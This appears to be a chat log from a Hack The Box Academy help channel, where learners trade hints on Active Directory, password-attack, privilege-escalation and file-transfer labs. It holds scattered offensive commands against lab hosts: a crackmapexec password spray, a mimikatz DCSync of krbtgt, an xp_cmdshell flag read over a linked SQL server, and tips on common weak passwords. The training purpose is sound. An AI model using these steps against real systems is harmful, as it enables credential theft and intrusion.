it should be :8887 not /8887, formatting did some dumb stuff
also try adding share1 at the end maybe?
Yeah it works
So since it is a web server then how do I upload files to it on the windows box. Different command?
you'd likely need to use invoke-webrequest
i'm rusty on my iwr stuff for windows but I think there's a section in File Transfers that has something like that
with you starting a python uploadserver
I tried using Invoke-FileUpload but it said network path problem
windows is weird with its syntax at times
That's so true
hey guys using tmux i get a lot of symbols, ex how would one prevent those or does one filter them out
if someone on skill assessment part 1 AD enumeration & attack can you confirm that MS01 is actually working , I got shell on it and can't run cmd ?
i wrote this for people stuck on that one. https://forum.hackthebox.com/t/active-directory-skills-assessment-i/257250/48 should help
idk who needs to read this but I was able to create a nice RDP tunnel to MS01 from my linux attack host using these simple steps which u can learn from the pivoting and tunneling module too. if you prefer a windows experience try these tricks. First, from the webshell, set the registry key so we can log in Set-ItemProperty -Path 'HKLM:\System...
fun fact: u can use these tricks to do the "impossible ad" set of the oscp exam should u be taking the exam and misfortunate enough to roll that set.
Hey guys, I am in the YARA and Sigma for SOC Analysts module in the SOC Analyst path and I am stuck in the Skills Assessment question:
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I tried running .\Seatbelt.exe but no luck. Also tried analyzing it in the HxD dump but got nowhere. If anyone could give me a baseline on how to go about this would be greatly appreciated.
Okay thanks
have you tried running strings on it and looking for suspiciously named strings that could fit the answer format?
I haven't. Let me try that! Thanks for the tip!
I'm still curious what the 'impossible ad' set is because the whole exam was pretty easy to me. Feels like 'impossible ad' is just for people to cope harder about failing, but I can't say for sure since I've got no way of knowing if my set was the supposed 'impossible set' or not.
it's the one with the disabled chisel
intentionally disabled *
or rather chisel is my plan B or if I need to specifically redirect to a local firewalled port
it really wasn't. I'm just convinced most failures are unprepared
i think people fail it because they expect to be carried by the training which is just so uninspired
but if you just do stuff on computers u will pass
the training is god awful
skills-wise it's entry level
If I hadn't wanted to complete it specifically for my blog post to compare it to CPTS it would have been an utter waste of time lol
The "impossible ad set" wasn't difficult at all
i know i used those tricks
would ligolo-ng have worked for the 'impossible ad' set? Because that's what I used by default in my exam.
some people on reddit dont know though and they will complain about it not tunneling
Didn't need that
it depends on if u get that set or not
I got the one they talked about on Reddit
Can I be admin on htb pwnbox
yes, the creds should be on the desktop
No it's not there. But if you mean the Admin desktop, I cant access it
That is good to know. Is there a way to get admin on the windows box for the file transfer module? Because I can't transfer any files to the windows machine otherwise
Why do you need to have admin rights? You only need to store the file in a directory in which your user has write permissions
Which method can you use for this?
I ended up using ligolo , I found it the easiest way
I really don't know exactly what you want to do. But to save a file somewhere, your user must have write permissions.
Okay I am on the directory with write perms, but whats the method for file transfer
wget or iwr, and host a web server on your attack box
or host a smb server (smbserver.py (dont forget -smb2support)) on attack box so you can copy it directly from windows box
cf File Transfers module on academy
That's the module they're doing I think
im having a bit of a hard time with ssh (so simple but idk what im doing wrong). module is passwords attacks, pass the ticket from linux.
the question gives the credentials and port to ssh to. (ssh david@<target-ip> -p 2222) however when prompted for the password, "Password2", it comes back as incorrect.
Hey. I started a python web server. Here's what happened:
t\Desktop\upload_win.zip
Invoke-WebRequest : Unable to connect to the remote server
2 things: is the web server running on port 80
and 2 i don't think the python server runs on https
im dumb.. i just read the passage lol i usually skip the passage and try to do what I can before I read stuff..
reading the card explains the card
Good evening! I am doing the Pass the ticket part of passwords module. In Rubeus when I go to run the command that should give me access to the share I get a 1450 error, not enough system resources to complete the requested service
Could this just mean I did it wrong or?
If anyone knows it'd be much appreciated!
Edit: nevermind! Found it
I transferred the file. It was port 8000 not 80. But after using the hash function on the file, I submit the hash and it says it's the wrong answer. Not sure why
it seems to be stuck. I am in skill assessment 2 for ad enumeration. I tried resetting the target, there is no change...
am i doing it wrong?
What makes you think that's the way to go
the task had weak password written in it so I thought might as well give it a try
netexec looks new I will look into that
It's the same as crackmapexec but better
what is the flag for domain in cme?
oh ok
I made a valid user list by using the user we got from the other questions
I am looking into netexec documentation now
I used cme to generate the userlist
And then password spray on the user list on the .50 ip
You can use cme for this as well
oh kerbrute returned the result
crackmapexec smb 172.16.7.50 -u <userlist> -p <passtotry>
took a while
Nice, yeah it does take long
It's a very big user list
well it worked with Welcome1 but what if I am in some other engagement how to determine the password to use
I used this cuz it was used before
Well you wouldn't really know, except if you'd find like other default creds for them
like far more common than it should be
Like Inlanefreight2023
but you'd have to dig into stuff
That's why I use Welcome01. People don't expect that
big brain
Ive seen it on a customer device before lul
sommer and winter are also common
So I'm trying to do one of the questions in the AD enumeration & attacks module, specifically the section on the ExtraSids attack. The question asks me to perform a Golden Ticket attack but I can't seem to get the NT hash for the child domain's KRBTGT account. This is the command I'm running and the error I'm getting:
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
Never mind this can be ignored, I got it to work
Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
I am stuck on this task in the ad enumeration and attacks module, can someone point me in some direction. I tried to log into the sql01 server but it did not work and both the users I found do not have replication rights. I tried as-rep but nothing was returned during recon
I tried looking for it in MS01 as the BRxxx user too, did not find anything

File containing a string
I tried to look for mssql conf files in hacktricks there was nothing there too
what am I missing
what kind of files might reasonably contain such a string? Review the section information
there is only this much info. I read the mssql section of the attacking common services module too just to clear the basics. I then performed an nmap scan on the sql01 server
Yes that's the skill assessment page, I'm talking about prior sections in the module.
Review your notes. if that doesnt reveal the clue reread the section information again
can you narrow the sections a little bit more please?
hi where do i start?
At the beginning
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
ty
i made it to the Q about julio and getting a file from \dc01\julio, I got past all that but I cant use cat or type against the flag.txt within smbclient
says the command isnt found... module Password attacks - pass the ticket linux... is there another command like those to read out the flag?
root@linux01:~# smbclient //dc01/julio -k -c cat julio.txt -no-pass
cat: command not found
cat isn't an smb command
mmm okay okay, good hint, let me dig. thanks
try just connecting, don't pass a command
also try putting -no-pass before the command flag
okay i was able to connect.. used help and i see available commands
gl
thank you
Update on this or for anyone else searching for help. A nudge is to REALLY pay attention to the question being asked. Something to be said for the KISS (Keep It Simple Stupid) method..
yep
Hi all, I am on the medium lab for the footprinting module and was wondering how to delete the TechSupport share after unmounting. I keep getting permission denied even as root.
I cannot post screenshots for some reason
anyone in this room who interacts at the same time with the HTB Forum, to ask something?
you need to link your account
you need to do sudo umount i believe, it's weird that it'd still show up after you say you unmounted
Maybe it will clear when I reboot the VM, I'm just being a little ocd right now
that's not OCD
hello there, anyone who can give me a hand with Module WinPrivEsc | Interacting with Users section, I'm trying to upload an SCF file, but can't find a writable drive in the shared folder, any hint..!!!
Stuck on WINDOWS PRIVILEGE ESCALATION: DnsAdmins
Question: Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt
Even after adding netadm to the Domain Admins group, why is the reverse shell not running? I have done the following.
Any nudge will be helpful
Stuck for so long..!!
Also after adding netadm to the Domain Admins group, is it supposed to be able to view the file contents of Administrator through File Explorer ?
again, why are you running sh on windows, and your user is already DA, why bother sending a rev shell
I'm stuck on WinPrivEsc | Interacting with users, I can't find a writable shared folder, any hint?
@gizmoe380
Sorry for repeating the same mistake for that sh part. In a hurry I repeated the same mistake.
But yes that's what I was asking. When netadm is in the Domain Admins group why does accessing a file on the Administrator Desktop show Access Denied?
relog
Mm ok
Let me try again
Anyone having issues getting into the Active Directory labs?
I am having issues getting a machine to spawn
I've tried changing VPNs and respawning three times for AD Skill Assessment 2.
I changed vpns, cleared cache, logged out and back in and still having issues
Thanks for confirming.
It's been hit or miss lately.
Also, it appears the targets disconnect at times even when the timer states 80 minutes on it
been waiting for target to spawn for the past 5 minutes
I have an enterprise account and its been over 20 minutes and my machine is still ""Deploying" how can i get this fixed?
is anyone having any connectivity problems right now?
Seems like we all are. Can't get the target to spawn
Yes , came here msg the same
mine finally just came up. We'll see how long it lasts
mine too
Hello in Windows Attacks & Defense module in the section regarding "PKI-ESC1" I cant seem to connect to the PKI server. I cant even ping it. Can somebody help with this as far as how would I connect and check the event logs?
Targets are spawning
Yeah, but they're spawning broken in my case
This is the given user:pass from the AD Skills Assessment 2
Any odd output from your openvpn connection, or are you using Pwnbox?
That error suggests you're not connected to the lab network
from a cursory glance it's either kali or pwnbox
just due to ssh being highlighted
that is kali
Hey Guys hope everyone's great, need a little bit of a heads up here. Just paid for academy to start learning but my work suddenly became busy, am only able to spend just an hour with the tutorial, so frustrating. Should I quit my job to stay focused, and does anyone know any remote job or something I can do cause I got bills to pay! just saying, any advice would be appreciated.
I wouldn't advocate to quit a job unless you can comfortably afford to do so
tried to relog in and still this issue..!!
Reset the target multiple times but don't know..!!
Did you relog or close and reopen the rdp session. There is a difference. Just closing the session without logging out leaves the user logged in.
Quit the rdp session..!!
Oo man..!!!
"Quit" how? Lol
worked
worked..
Go to sleep. Or at least step away from the computer. Looks like you need a break
ah..!!
i hate windows from now on
Tbf wouldn't it be odd to turn your computer on (from a non-hibernated state) to a screen full of stuff you did last time?
I wish but i really need to finish the CPTS within the month..!!
got your point..!!
Thanks @fathom pendant
Good luck
But the more you push yourself the more mistakes you are inevitably gonna make

Looks like I really need this..!!
ooohhhkayy..!!!
Little break time..!
setting a hard time limit and forcing yourself to continue is not the way to go imo
Thank you for the advice.!!!
Through the rush I forgot few essentials of life..!!
Imo if you're trying to rush bc you forgot about your silver annual, I'd make sure you cancel the sub so it doesn't try and auto renew
Not afaik
We do have discounts now and again
I am also trying to complete the Path by the end of the month -> then one revision to consolidate my notes, then will attempt the Attacking Enterprise module blind and hopefully by March attempt the exam, currently at 72%
Best to keep an eye on our social channels
Can I dm you ?
Yes
do you have a family?
I just wouldn't say to quit until they find another job
Yeah but no kid and not playing kid
linkedIn, X , __ __
Can I have few more?
I think the team hit up Instagram too
I went through my notes, I could not find anything related to a file having an mssql string, nor in hacktricks. I even got a shell on the sql01 server. module need a hint please
Which module / section?
can anyone give me a nudge on Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab?
The tool was mentioned in one of the sections of the module
hi, can anyone give me a nudge please?
what u need help with?
may i dm?
why whats the question
can't figure out how to get the proper server version, i've been looking through the writeup at the beginning of the chapter, and been experimenting
should i be using --source-port 53 and target port 22?
do not look at writeups
i meant the
whats the module?
Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab
to enumerate server version look into commonly used switches
hello guys can someone help me login, it says that this account does not match our records
login where?
I am still confused can you narrow it a bit more?
please
It was mentioned once in the beginning of the module (briefly)
and to get more info about it you need to go deep down into the rabbit hole
running module password attacks, protected files
im getting permission denied on ssh2john.py is that normal
Does the file have the executable bit set on it?
its id_rsa that I copied from the target host over to my attack machine.. its contents are just encrypted
You said you were getting permission denied on ssh2john.py - I assume you're trying to execute it?
yeah, like this "ssh2john.py /home/htb-ac-855687/id_rsa > crack"
whereis ssh2john.py, and then ls -lh <path from above command> - what do you see?
whereis = /usr/share/john/ssh2john.py
ls -lh = -rwxr-xr-x 1 root root 7.6K Jan 25 2021 /usr/share/john/ssh2john.py
i have to be root?
Is the id_rsa file root?
managed to get OS, but version is unrecognized :(
/usr/share/john
There's your problem
whats the question
Do you have write access to that directory?
no it shouldnt be
Submit the DNS server version of the target as the answer.
hmm.. probably not
what have you tried so far?
echo $PATH - it'll show directories that will be included when looking for a "local" file, e.g. without a path
sudo nmap <ip>, no icmp echo requests, no DNS resolution, on some confirmed open ports and a confirmed closed port, check for service version and output, osscan, source port 53
i managed to get the open state on port 53, but osscan returned that it couldn't identify the fingerprint
I looked in the rabbit hole thought to use this but even this is not working
crackmapexec smb 172.16.7.60 -u BR086 -p Welcome1 -M spider_plus --share 'Department Shares'
you are only looking at TCP
cme is not the only tool you can use to access smb shares
DNS queries are made over another port...
seems something is wrong with john, getting this error
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
use python 2
back in the day
haha
lol damn today is not my day.. pwnbox doesn't find python2
python2.7
the number of folders I had to go through to find that
is there a way to use tree?
@lyric sigil is there a reason you dmed me without asking?
oh dip, really? i thought since the service is on port 53, queries would be on the same port
dns queries are generally over 53, hence it being known as the "DNS" port
tcp/udp
sorry i was struggling here, but i already fixed it, mb for the trouble at this time
thanks for answer
the only reason I ask is because 2 things:
- I don't know you
- read #rules; don't dm people without asking
I'm not staff/mod, so I don't have the unfortunate luxury of needing to respond to random PMs
that's fair; I just mean I generally have to deal with rando PMs for a server I actually do mod for, usually just to bait them into revealing they're an art scammer or a "promoter"
the skill assessment for ad enum is really covering a lot of things. After I gained access to the db admin on the sql server I still cannot access the admin desktop. I guess I gotta do xp_dirtree
I'm stuck on the Attacking Common Services Hard lab, last question.
I already impersonated the correct user, can interact with the linked sql server but when I try to retrieve the flag using EXECUTE('xp_cmdshell "type C:\Users\Administrator\Desktop\flag.txt >c:\users\fiona\desktop\x.txt"') AT [LOCAL.TEST.LINKED.SRV]
and i am getting this error: Msg 15281, Level 16, State 1, Server WIN-HARD\SQLEXPRESS, Procedure xp_cmdshell, Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. 1> type c:\users\fiona\desktop\x.txt for that reason i can not see the flag, can someone please help me ?
well it says xp_cmdshell is deactivated, so you either have to see if you can activate it or if there is another thing you can try
how can i activate >?
read the sql section in the module
bro do you think that i didnt ? i am almost ending this lab
i just need that hint xd
the hint is already given
He wasn't saying you didn't, just saying there may be additional things to try
okay my bad
Has anyone experienced this issue?
proxychains evil-winrm -u backupadm -i 10.129.239.174
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1
Yeah my bad, I meant tcp /udp.
I tried reinstalling evil-winrm. Changing proxychains.conf to different ports.
I edited VPN file, still experiencing the issue.
I mean you should scan udp too.
it's an openssl issue https://github.com/BlackArch/blackarch/issues/3593#issuecomment-1326265740
@next bronze - Thank you, appreciated.
If I buy Platinum, can I unlock multiple modules or does a previous module need to be completed to be eligible for unlock?
you can unlock as many as you want as long as you have the cubes
by finishing a previous module you get some of the cubes back, but you can do that at any time
So it's cheapest to buy Platinum and just unlock them
unless you are a student, yes
Two months of platinum will unlock a whole path basically
yep, and with extra cubes to spare
And do you get to keep the modules even after you end your subscription?
any module you unlock you keep forever
Sweet
you do lose access to unlimited pwnbox though, but its better to have your own vm anyway
I'll just buy Platinum when I get paid on Friday
I haven't tried Pwnbox yet, I've just been using a VM
it's just a VM in the browser, so nothing special in your case. If you don't have the resources to run your own VM it can be helpful, but if you are serious about this you are likely to set up your own VM anyway
It's fast enough for HTB content
Thank you guys for the cool product
I'm learning a lot
That's awesome, thank you
4 amd epyc 7453 cores iirc
Oh, that's probably faster than what I'm using then
I am using 2 i5-7200U
with 4 GB RAM
May I ask an entry-level question here..... if I have no foundation and I want to change career to hacker, how much and how long do I need if I study on Hack The Box?? thx a lot
depends on how much effort you put into it
I mean how much it will cost me on Hack The Box.... I just want to have an idea of how much I need to prepare before changing career and starting to make money by hacking
hi folks, where do we submit/report issues within learning modules?
You can report such things in #858470491676737536
thanks @ocean night !
hey guys, how can I find free rooms or something free like TryHackMe? I'm new to HTB
There's plenty of free content available at Hack The Box! For a more "led" experience with training material, the Academy is your best bet (https://academy.hackthebox.com). If you have some experience and want a challenge by attacking boxes without any prior knowledge, then the Labs are for you (https://app.hackthebox.com)
Thank you
https://academy.hackthebox.com/module/158/section/1439
man this RDP stuff is giving me dial-up flashbacks. Damn, too slow!!
are there any known server issues? all my nmap requests never finish?
are you connected to the vpn? also make sure your nmap scan isn't crazy slow or doing a lot of things at the same time
Module: INFORMATION GATHERING - WEB EDITION
section DNS:
The question is:
Which subdomain is returned when querying the PTR record for 173.0.87.51?
I am using the below command
dig -x 173.0.87.51
and getting two subdomains, and on submit I get the output ---> incorrect answer
please guide me if I am doing something wrong
yes I'm using Parrot
refresh the page and check the question again
it's also slow on a simple sV scan
also for an sS scan
yes it's solved, what was the issue?
As you can see now the IP address has changed
hello everyone. I am trying to connect to the HTB cozyhosting.htb machine, but I am having a connection problem. I successfully connected to the VPN. I also got a response when I pinged the server, but I cannot connect to cozyhosting.htb in Firefox.
the problem is:
"Check that Firefox has permission to access the web(you might be connected but behind a firewall)"
how can I fix this problem
add cozyhosting.htb to your /etc/hosts file
also this question is better suited for the #boxes channel
thanks.
I did that, but it did not fix it.
and how can I access the channel? I couldn't see or join the channel.
Stuck on that too
Hi
Hello guys, I'm struggling trying to load the SocksOverRDP.dll; every time I run the regsvr32.exe command it fails, claiming that the DLL failed to load.. Any idea why? [SOLVED]
Hi guys, currently doing the Windows Privilege Escalation Skills Assessment - Part II module for CPTS. I noticed that AlwaysInstallElevated was enabled (cf screen), however when I run my revshell with msiexec I get a shell as my current user and not as SYSTEM. Can any of you guys nudge me in the right direction?
I found someone exposing answers to active modules; how/where do I report it?
Or can I just DM a mod?
hello! is it just me or is anyone else facing this, it's taking forever for the Pwnbox to load
weirdly enough I can add a user to the admin group, so I guess I'll go with that